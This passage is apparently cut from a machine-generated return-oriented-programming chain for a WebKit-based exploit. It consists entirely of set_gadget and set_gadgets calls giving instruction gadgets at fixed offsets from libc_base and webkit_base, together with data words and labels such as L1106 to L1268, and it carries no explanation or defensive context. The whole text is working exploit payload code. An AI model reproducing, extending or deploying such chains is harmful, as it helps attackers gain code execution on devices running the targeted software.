set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+108624, //L1106 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1106: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+108680, //L1107 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1107: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+108768, //L1109 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 
libc_base+763368 //pop rcx ]); //L1109: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1111: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+108888, //L1114 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+108872, //L1112 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1112: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1114: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+109032, //L1117 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+109000, //L1115 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+109016, //L1116 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1115: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1116: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1117: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+109104, //L1119 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1119: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+109160, //L1120 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1120: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi 
ropchain+109256, //L1123 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1122: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L1123: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1124: db([6, 0]); // 0x6 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+109352, //L1125 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+109368, //L1126 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1125: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1126: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+835093, //sub rax, rcx ; sbb rdx, rcx libc_base+764760, //pop rsi ropchain+109456, //L1128 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1128: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+109512, //L1129 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1129: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+109616, //L1131 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1131: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1133: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi 
ropchain+109736, //L1136 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+109720, //L1134 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1134: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1136: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+109880, //L1139 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+109848, //L1137 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+109864, //L1138 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1137: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1138: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1139: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+109952, //L1141 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1141: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+110008, //L1142 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1142: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+110104, //L1145 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1144: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L1145: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); 
//pop rax //L1146: db([22, 0]); // 0x16 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+110200, //L1147 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+110216, //L1148 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1147: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1148: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+110304, //L1150 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1150: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+110360, //L1151 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1151: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+110432, //L1154 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1154: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+110488, //L1155 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1155: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax //L1157: libc_base+533450, //mov [rcx], rdi libc_base+764760 
//pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+110624, //L1158 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1158: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1160: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+110744, //L1163 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+110728, //L1161 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1161: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1163: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+110888, //L1166 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+110856, //L1164 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+110872, //L1165 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1164: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1165: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1166: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+110960, //L1168 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1168: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+111016, //L1169 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1169: 
db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+111112, //L1172 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1171: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L1172: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1173: db([23, 0]); // 0x17 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+111208, //L1174 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+111224, //L1175 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1174: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1175: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+111312, //L1177 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1177: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+111368, //L1178 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1178: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+111440, //L1181 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1181: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi 
ropchain+111496, //L1182 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1182: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax //L1184: libc_base+144605, //pop rdi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+111632, //L1185 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1185: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1187: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+111752, //L1190 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+111736, //L1188 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1188: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1190: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+111896, //L1193 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+111864, //L1191 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+111880, //L1192 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1191: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1192: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1193: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ 
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+111968, //L1195 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1195: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+112024, //L1196 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1196: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+112120, //L1199 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1198: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L1199: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1200: db([24, 0]); // 0x18 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+112216, //L1201 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+112232, //L1202 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1201: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1202: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+112320, //L1204 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1204: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+112376, //L1205 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx 
libc_base+763368 //pop rcx ]); //L1205: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+112448, //L1208 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1208: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+112504, //L1209 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1209: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+112592, //L1211 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1211: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1213: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+112712, //L1216 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+112696, //L1214 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1214: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1216: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+112856, //L1219 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+112824, //L1217 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+112840, //L1218 webkit_base+660161, //mov [rsi], rax ; mov 
al, 1 libc_base+763368 //pop rcx ]); //L1217: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1218: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1219: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+112928, //L1221 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1221: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+112984, //L1222 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1222: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+113080, //L1225 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1224: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L1225: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1226: db([2, 0]); // 0x2 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+113176, //L1227 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+113192, //L1228 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1227: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1228: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+835093, //sub rax, rcx ; sbb rdx, rcx libc_base+764760, //pop rsi ropchain+113280, //L1230 webkit_base+660161, //mov [rsi], rax ; mov 
al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1230: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+113336, //L1231 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1231: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+113440, //L1233 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1233: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1235: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+113560, //L1238 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+113544, //L1236 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1236: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1238: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+113704, //L1241 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+113672, //L1239 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+113688, //L1240 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1239: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1240: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1241: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi 
db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+113776, //L1243 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1243: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+113832, //L1244 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1244: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+113928, //L1247 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1246: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L1247: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1248: db([25, 0]); // 0x19 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+114024, //L1249 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+114040, //L1250 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1249: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1250: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+114128, //L1252 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1252: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+114184, //L1253 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1253: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+114256, //L1256 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1256: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+114312, //L1257 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1257: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax //L1259: libc_base+756002, //mov [rdi], r8 libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+114448, //L1260 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1260: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1262: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+114568, //L1265 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+114552, //L1263 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1263: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1265: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+114712, //L1268 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi 
